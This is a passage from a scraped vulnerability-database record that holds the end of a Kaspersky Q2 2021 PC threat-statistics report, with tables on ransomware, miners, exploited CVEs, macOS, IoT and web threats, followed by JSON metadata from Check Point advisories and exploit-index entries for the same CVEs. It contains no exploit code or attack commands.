(NAS) devices. There appeared the new [Qlocker](<https://support.qnap.ru/hc/ru/articles/360021328659-\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c-Qnap-Ransomware-Qlocker>) family, which packs user files into a password-protected 7zip archive, plus our old friends [ech0raix](<https://www.qnap.com/en/security-advisory/QSA-21-18>) and [AgeLocker](<https://www.qnap.com/en-us/security-advisory/QSA-21-15>) began to gather steam.\n\n### Number of new ransomware modifications\n\nIn Q2 2021, we detected 14 new ransomware families and 3,905 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2020 \u2014 Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141411/03-en-ru-es-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2021, Kaspersky products and technologies protected 97,451 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141438/04-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of ransomware attacks\n\n_Geography of attacks by ransomware Trojans, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141505/05-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by ransomware Trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.85 \n2 | Ethiopia | 0.51 \n3 | China | 0.49 \n4 | Pakistan | 0.40 \n5 | Egypt | 0.38 \n6 | Indonesia | 0.36 \n7 | Afghanistan | 0.36 \n8 | Vietnam | 0.35 \n9 | Myanmar | 0.35 \n10 | Nepal | 0.33 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 20.66 \n2 | Stop | Trojan-Ransom.Win32.Stop | 19.70 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 9.10 \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 6.37 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.08 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 5.87 \n7 | (generic verdict) | Trojan-Ransom.Win32.Agent | 5.19 \n8 | PolyRansom/VirLock | Virus.Win32.Polyransom / Trojan-Ransom.Win32.PolyRansom | 2.39 \n9 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 1.48 \n10 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 1.26 \n \n_* Unique Kaspersky users attacked by this family of ransomware Trojans as a percentage of all users attacked by such malware._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2021, Kaspersky solutions detected 31,443 new modifications of miners.\n\n_Number of new miner modifications, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141534/06-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 363,516 unique users of Kaspersky products worldwide. At the same time, the number of attacked users gradually decreased during the quarter; in other words, the downward trend in miner activity returned.\n\n_Number of unique users attacked by miners, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141602/07-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141627/08-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 3.99 \n2 | Ethiopia | 2.66 \n3 | Rwanda | 2.19 \n4 | Uzbekistan | 1.61 \n5 | Mozambique | 1.40 \n6 | Sri Lanka | 1.35 \n7 | Vietnam | 1.33 \n8 | Kazakhstan | 1.31 \n9 | Azerbaijan | 1.21 \n10 | Tanzania | 1.19 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nQ2 2021 injected some minor changes into our statistics on exploits used by cybercriminals. In particular, the share of exploits for Microsoft Office dropped to 55.81% of the total number of threats of this type. Conversely, the share of exploits attacking popular browsers rose by roughly 3 p.p. to 29.13%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141656/09-en-malware-report-q2-2021-graphs-pc.png>))_\n\nMicrosoft Office exploits most often tried to utilize the memory corruption vulnerability [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). This error can occur in the Equation Editor component when processing objects in a specially constructed document, and its exploitation causes a buffer overflow and allows an attacker to execute arbitrary code. Also seen in Q2 was the similar vulnerability [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which causes a buffer overflow on the stack in the same component. Lastly, we spotted an attempt to exploit the [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) vulnerability, which, like other bugs in Microsoft Office, permits the execution of arbitrary code in vulnerable versions of the software.\n\nQ2 2021 was marked by the emergence of several dangerous vulnerabilities in various versions of the Microsoft Windows family, many of them observed in the wild. Kaspersky alone found three vulnerabilities used in targeted attacks:\n\n * [CVE-2021-28310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-28310>) \u2014 an out-of-bounds (OOB) write vulnerability in the Microsoft DWM Core library used in Desktop Window Manager. Due to insufficient checks in the data array code, an unprivileged user using the DirectComposition API can write their own data to the memory areas they control. As a result, the data of real objects is corrupted, which, in turn, can lead to the execution of arbitrary code;\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2014 an information disclosure vulnerability that exposes information about kernel objects. Together with other exploits, it allows an intruder to attack a vulnerable system;\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2014 a vulnerability in the ntfs.sys file system driver. It causes incorrect checking of transferred sizes, allowing an attacker to inflict a buffer overflow by manipulating parameters.\n\nYou can read more about these vulnerabilities and their exploitation in our articles [PuzzleMaker attacks with Chrome zero-day exploit chain](<https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/>) and [Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>).\n\nOther security researchers found a number of browser vulnerabilities, including:\n\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2014 a bug in the Microsoft Trident browser engine (MSHTML) that allows writing data outside the memory of operable objects;\n * Three Google Chrome vulnerabilities found in the wild that exploit bugs in various browser components: [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2014 a data type confusion vulnerability in the V8 scripting engine; [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2014 a use-after-free vulnerability in the WebGL component; and [CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>) \u2014 a heap corruption vulnerability;\n * Three vulnerabilities in the WebKit browser engine, now used mainly in Apple products (for example, the Safari browser), were also found in the wild: [CVE-2021-30661](<https://support.apple.com/en-us/HT212317>) \u2014 a use-after-free vulnerability; [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>) \u2014 a memory corruption vulnerability; and [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>) \u2014 an integer overflow vulnerability.\n\nAll of these vulnerabilities allow a cybercriminal to attack a system unnoticed if the user opens a malicious site in an unpatched browser.\n\nIn Q2, two similar vulnerabilities were found ([CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) and [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>)), exploiting integer overflow bugs in the Microsoft Windows Cryptographic Provider component. Using these vulnerabilities, an attacker could prepare a special signed document that would ultimately allow the execution of arbitrary code in the context of an application that uses the vulnerable library.\n\nBut the biggest talking point of the quarter was the [critical vulnerabilities CVE-2021-1675 and CVE-2021-34527](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>) in the Microsoft Windows Print Spooler, in both server and client editions. Their discovery, together with a [proof of concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), caused a stir in both the expert community and the media, which dubbed one of the vulnerabilities PrintNightmare. Exploitation of these vulnerabilities is quite trivial, since Print Spooler is enabled by default in Windows, and the methods of compromise are available even to unprivileged users, including remote ones. In the latter case, the RPC mechanism can be leveraged for compromise. As a result, an attacker with low-level access can take over not only a local machine, but also the domain controller, if these systems have not been updated, or available [risk mitigation methods](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) against these vulnerabilities have not been applied.\n\nAmong the network threats in Q2 2021, attempts to brute-force passwords in popular protocols and services (RDP, SSH, MSSQL, etc.) are still current. Attacks using EternalBlue, EternalRomance and other such exploits remain prevalent, although their share is gradually shrinking. New attacks include [CVE-2021-31166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31166>), a vulnerability in the Microsoft Windows HTTP protocol stack that causes a denial of service during processing of web-server requests. To gain control over target systems, attackers are also using the previously found NetLogon vulnerability ([CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>)) and, for servers running Microsoft Exchange Server, vulnerabilities recently discovered while researching targeted attacks by the [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group.\n\n## Attacks on macOS\n\nAs for threats to the macOS platform, Q2 will be remembered primarily for the appearance of new samples of the XCSSET Trojan. Designed to steal data from browsers and other applications, the malware is notable for spreading itself through infecting projects in the Xcode development environment. The Trojan takes the form of a bash script packed with the SHC utility, allowing it to evade macOS protection, which does not block script execution. During execution of the script, the SHC utility uses the RC4 algorithm to decrypt the payload, which, in turn, downloads additional modules.\n\n**Top 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.j | 14.47 \n2 | AdWare.OSX.Pirrit.ac | 13.89 \n3 | AdWare.OSX.Pirrit.o | 10.21 \n4 | AdWare.OSX.Pirrit.ae | 7.96 \n5 | AdWare.OSX.Bnodlero.at | 7.94 \n6 | Monitor.OSX.HistGrabber.b | 7.82 \n7 | Trojan-Downloader.OSX.Shlayer.a | 7.69 \n8 | AdWare.OSX.Bnodlero.bg | 7.28 \n9 | AdWare.OSX.Pirrit.aa | 6.84 \n10 | AdWare.OSX.Pirrit.gen | 6.44 \n11 | AdWare.OSX.Cimpli.m | 5.53 \n12 | Trojan-Downloader.OSX.Agent.h | 5.50 \n13 | Backdoor.OSX.Agent.z | 4.64 \n14 | Trojan-Downloader.OSX.Lador.a | 3.92 \n15 | AdWare.OSX.Bnodlero.t | 3.64 \n16 | AdWare.OSX.Bnodlero.bc | 3.36 \n17 | AdWare.OSX.Ketin.h | 3.25 \n18 | AdWare.OSX.Bnodlero.ay | 3.08 \n19 | AdWare.OSX.Pirrit.q | 2.84 \n20 | AdWare.OSX.Pirrit.x | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs in the previous quarter, a total of 15 of the Top 20 threats for macOS are adware programs. The Pirrit and Bnodlero families have traditionally stood out from the crowd, with the former accounting for two-thirds of the total number of threats.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141728/10-en-malware-report-q2-2021-graphs-pc.png>))_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | India | 3.77 \n2 | France | 3.67 \n3 | Spain | 3.45 \n4 | Canada | 3.08 \n5 | Italy | 3.00 \n6 | Mexico | 2.88 \n7 | Brazil | 2.82 \n8 | USA | 2.69 \n9 | Australia | 2.53 \n10 | Great Britain | 2.33 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q2 2021, first place by share of attacked users went to India (3.77%), where adware applications from the Pirrit family were most frequently encountered. A comparable situation was observed in France (3.67%) and Spain (3.45%), which ranked second and third, respectively.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q2 2021, as before, most of the attacks on Kaspersky traps came via the Telnet protocol.\n\nTelnet | 70.55% \n---|--- \nSSH | 29.45% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q2 2021_\n\nThe statistics for cybercriminal working sessions with Kaspersky honeypots show similar Telnet dominance.\n\nTelnet | 63.06% \n---|--- \nSSH | 36.94% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q2 2021_\n\n**Top 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 30.25% \n2 | Trojan-Downloader.Linux.NyaDrop.b | 27.93% \n3 | Backdoor.Linux.Mirai.ba | 5.82% \n4 | Backdoor.Linux.Agent.bc | 5.10% \n5 | Backdoor.Linux.Gafgyt.a | 4.44% \n6 | Trojan-Downloader.Shell.Agent.p | 3.22% \n7 | RiskTool.Linux.BitCoinMiner.b | 2.90% \n8 | Backdoor.Linux.Gafgyt.bj | 2.47% \n9 | Backdoor.Linux.Mirai.cw | 2.52% \n10 | Backdoor.Linux.Mirai.ad | 2.28% \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT threat statistics are published in our Q2 2021 DDoS report: <https://securelist.com/ddos-attacks-in-q2-2021/103424/#attacks-on-iot-honeypots>\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that serve as sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q2 2021, Kaspersky solutions blocked 1,686,025,551 attacks from online resources located across the globe. 675,832,360 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141800/13-en-malware-report-q2-2021-graphs-pc.png>))_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Belarus | 23.65 \n2 | Mauritania | 19.04 \n3 | Moldova | 18.88 \n4 | Ukraine | 18.37 \n5 | Kyrgyzstan | 17.53 \n6 | Algeria | 17.51 \n7 | Syria | 15.17 \n8 | Uzbekistan | 15.16 \n9 | Kazakhstan | 14.80 \n10 | Tajikistan | 14.70 \n11 | Russia | 14.54 \n12 | Yemen | 14.38 \n13 | Tunisia | 13.40 \n14 | Estonia | 13.36 \n15 | Latvia | 13.23 \n16 | Libya | 13.04 \n17 | Armenia | 12.95 \n18 | Morocco | 12.39 \n19 | Saudi Arabia | 12.16 \n20 | Macao | 11.67 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average during the quarter, 9.43% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141830/14-en-malware-report-q2-2021-graphs-pc.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q2 2021, our File Anti-Virus detected **68,294,298** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Turkmenistan | 49.38 \n2 | Tajikistan | 48.11 \n3 | Afghanistan | 46.52 \n4 | Uzbekistan | 44.21 \n5 | Ethiopia | 43.69 \n6 | Yemen | 43.64 \n7 | Cuba | 38.71 \n8 | Myanmar | 36.12 \n9 | Syria | 35.87 \n10 | South Sudan | 35.22 \n11 | China | 35.14 \n12 | Kyrgyzstan | 34.91 \n13 | Bangladesh | 34.63 \n14 | Venezuela | 34.15 \n15 | Benin | 32.94 \n16 | Algeria | 32.83 \n17 | Iraq | 32.55 \n18 | Madagascar | 31.68 \n19 | Mauritania | 31.60 \n20 | Belarus | 31.38 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/11141906/15-en-malware-report-q2-2021-graphs-pc.png>))_\n\nOn average worldwide, **Malware-class** local threats were recorded on 15.56% of users' computers at least once during the quarter. Russia scored 17.52% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:12", "type": "securelist", "title": "IT threat evolution in Q2 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1472", "CVE-2021-1675", "CVE-2021-21220", "CVE-2021-28310", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-31166", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33742", "CVE-2021-34527"], "modified": "2021-08-12T10:00:12", "id": "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "href": "https://securelist.com/it-threat-evolution-in-q2-2021-pc-statistics/103607/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:34:24", "description": "An information disclosure vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Information Disclosure (CVE-2021-31955)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0316", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:34:24", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows NTFS Elevation of Privilege (CVE-2021-31956)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0318", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:29:27", "description": "A remote code execution vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-16T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Remote Code Execution (CVE-2021-21224)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21224"], "modified": "2022-01-16T00:00:00", "id": "CPAI-2021-0952", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:08", "description": "A remote code execution vulnerability exists in Google Chrome. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-10T00:00:00", "type": "checkpoint_advisories", "title": "Google Chrome Remote Code Execution (CVE-2021-21220)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21220"], "modified": "2021-05-10T00:00:00", "id": "CPAI-2021-0276", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-29T09:12:19", "description": "# CVE-2021-31955 Windows Kernel Informati...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-26T03:59:38", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2022-04-29T01:39:44", "id": "399B15EF-A742-5722-86D2-59F3580C307B", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-16T13:02:51", "description": "Working in WIN10...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-11T16:03:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2022-08-16T12:51:57", "id": "82A7AD32-D5F8-59E5-AC8B-6B99F9E33F64", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T15:42:49", "description": "# 